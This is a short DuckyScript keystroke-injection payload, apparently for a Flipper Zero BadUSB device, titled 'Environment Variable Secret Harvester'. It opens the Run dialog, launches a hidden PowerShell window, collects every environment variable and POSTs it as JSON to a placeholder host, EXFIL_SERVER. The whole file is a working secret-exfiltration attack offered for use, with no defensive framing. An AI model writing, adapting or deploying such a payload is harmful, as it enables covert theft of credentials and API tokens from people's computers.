REM ===============================================================
REM Environment Variable Secret Harvester - NullSec Flipper Suite  
REM Extracts secrets from environment variables
REM ===============================================================
REM Target: Windows/Linux/macOS
REM Author: bad-antics
REM ===============================================================

GUI r
DELAY 200
STRING powershell -w hidden -c "[Environment]::GetEnvironmentVariables() | ConvertTo-Json | Invoke-RestMethod -Uri 'http://EXFIL_SERVER/env' -Method POST -Body $_"
ENTER
